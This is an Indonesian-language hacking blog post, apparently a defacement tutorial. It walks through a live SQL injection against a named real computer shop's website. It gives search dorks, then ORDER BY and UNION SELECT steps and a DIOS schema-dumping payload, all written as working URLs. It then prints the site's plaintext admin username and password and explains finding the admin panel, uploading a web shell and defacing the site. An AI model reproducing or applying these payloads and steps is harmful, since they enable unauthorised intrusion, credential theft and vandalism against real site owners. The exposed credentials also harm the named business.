Lompat ke konten Lompat ke sidebar Lompat ke footer

Deface Poc SQL injection + Upload Shell

 

Assalamualaikum aa/teteh adick-adick
Kali ini nzul yang ganteng akan lanjutin lagi ya tentang bug SQL injection.
Ok sekarang lanjut ya, seperti biasa kamu nge dork dulu
Dork?
inurl:/com-product.php?id=
inurl:/gov-product.php?id=
inurl:/in-product.php?catid=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
Kembangin lagi yaa

Karena disini aku sudah ada live target
Jadi langsung aja
Live target yang aku pake? Touch me oneeSan
Step by step
Kamu cari dulu parameter nya 

Pertama kalian cek dulu apakah vuln SQL 
Caranya dengan menambahkan kode (')
Misal
http://tokoflobamoracomputermalang.com/detail.php?id=52'
http://tokoflobamoracomputermalang.com/detail.php?id=52%27--+- (error)
Nah bakalan jadi gini nantinya.

Terus kalian tambahkan (--+-)
http://tokoflobamoracomputermalang.com/detail.php?id=52%27--+- (normal)
Dan webnya kembali seperti semula.

Ok sekarang kita order by
Buat mencari letak eror nya dimana

Coba dlu Ampe angka 10
http://tokoflobamoracomputermalang.com/detail.php?id=52%27+order+by+1,2,3,4,5,6,7,8,9,10--+- (normal)
http://tokoflobamoracomputermalang.com/detail.php?id=52%27+order+by+1,2,3,4,5,6,7,8,9--+-(normal)
http://tokoflobamoracomputermalang.com/detail.php?id=52%27+order+by+1,2,3,4,5,6,7,8--+-(normal)
http://tokoflobamoracomputermalang.com/detail.php?id=52%27+order+by+1,2,3,4,5,6,7--+-(error)

Nah di angka 7 erornya
Berarti kita union select Ampe angka 6

Nah gini, jangan lupa kasih (-) dibelakang param
http://tokoflobamoracomputermalang.com/detail.php?id=-52%27+union+select+1,2,3,4,5,6--+-
Nah muncul deh angka ajaib 2
Ok dikarenakan ini mau upload Shell
Jadi kita pake Dios ini:
make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)

Jadi seperti ini, tempelkan di angka 2
Karena disitulah angka ajaibnya

http://tokoflobamoracomputermalang.com/detail.php?id=-52%27+union+select+1,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),3,4,5,6--+-

Dann booommm database udah keliatan
Tinggal Kelen nyari table adminnya
Dan username/password nya
http://tokoflobamoracomputermalang.com/detail.php?id=-52%27+union+select+1,username,3,4,password,6+from+admin--+-

Nah dan boom muncul deh username dan passwordnya
Username: flobamoracomputer
Password: malang2112346
Setelah menemukan username/password
Jangan lupa untuk nyari tempat login nya dulu, jadi kalian GK capek" nginject nya
Site.com/admin
Site.com/admin/login
Site.com/login
Site.com/admin.php
Site.com/login.php
Nah setelah masuk dasbor Kelen cari aja tempat upload

Nah tinggal upload yakan shellmu.
Dan jangan lupa juga terkadang web yang vuln SQL, itu ada yang bisa langsung upload Shell ada juga yang harus kamu Tamper data
Kalo misal 403 gunakan Shell bypass
Intinya pandai" aja ya

Nah tinggal buka di new tab
Nah muncul deh
Dan boom, tinggal di Deface deh
Ok sekian ya tutorial dari nzul
Semoga bermanfaat

Visit juga my friend Suhu Sanz

Greatz:

Thanks u all and my friend






Posting Komentar untuk "Deface Poc SQL injection + Upload Shell"